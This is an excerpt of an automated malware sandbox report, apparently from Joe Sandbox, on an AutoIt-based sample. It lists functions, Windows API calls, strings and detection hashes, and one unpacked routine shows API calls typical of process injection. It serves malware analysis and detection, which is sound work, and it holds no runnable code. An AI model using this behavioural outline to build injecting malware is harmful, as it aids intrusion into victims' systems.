                                                Function 03EDE3C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 03EDE2B0: Sleep.KERNELBASE(000001F4), ref: 03EDE2C1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EDE507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: IKD8YWMQMNSKBQKBJUDEDU6ECDYOLQ
                                                • API String ID: 2694422964-4271138072
                                                • Opcode ID: feeae1f31a4e675568598818b0a19e80bcdf37427a407280b660ff29177cecde
                                                • Instruction ID: e4602f8add9d9d6c67df8b8eb7a2dfddef05794b33dd440078d390c55618eb4d
                                                • Opcode Fuzzy Hash: feeae1f31a4e675568598818b0a19e80bcdf37427a407280b660ff29177cecde
                                                • Instruction Fuzzy Hash: 2461A270D04288DAEF11DBF4C858BDEBBB4AF55304F044288E6487B2C1D7BA5B49CB66
                                                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                • String ID: Line:
                                                • API String ID: 1874344091-1585850449
                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Close$OpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 1607946009-824357125
                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                • _wcsncpy.LIBCMT ref: 00410340
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                • String ID:
                                                • API String ID: 3170942423-0
                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                Function 03EDD2B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDDADD
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDDB01
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDDB23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                • Instruction ID: aea23c9d6a84867e3e9f22dd5b2ae86d136ba13590ca702fe9c7c3539daa73fc
                                                • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                • Instruction Fuzzy Hash: 4C62F930A14258DBEB24CFA4CC50BEEB376EF58304F10A1A9D10DEB294E7759E81CB59
                                                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Error:
                                                • API String ID: 4104443479-232661952
                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                • String ID: X$pWH
                                                • API String ID: 85490731-941433119
                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00401B57
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                • String ID: @EXITCODE
                                                • API String ID: 2734553683-3436989551
                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                • String ID:
                                                • API String ID: 1794320848-0
                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$CurrentTerminate
                                                • String ID:
                                                • API String ID: 2429186680-0
                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • _malloc.LIBCMT ref: 0043214B
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _malloc.LIBCMT ref: 0043215D
                                                • _malloc.LIBCMT ref: 0043216F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _malloc$AllocateHeap
                                                • String ID:
                                                • API String ID: 680241177-0
                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 4217535847-0
                                                • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                • _free.LIBCMT ref: 004295A0
                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3938964917-2806939583
                                                • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                Strings
                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
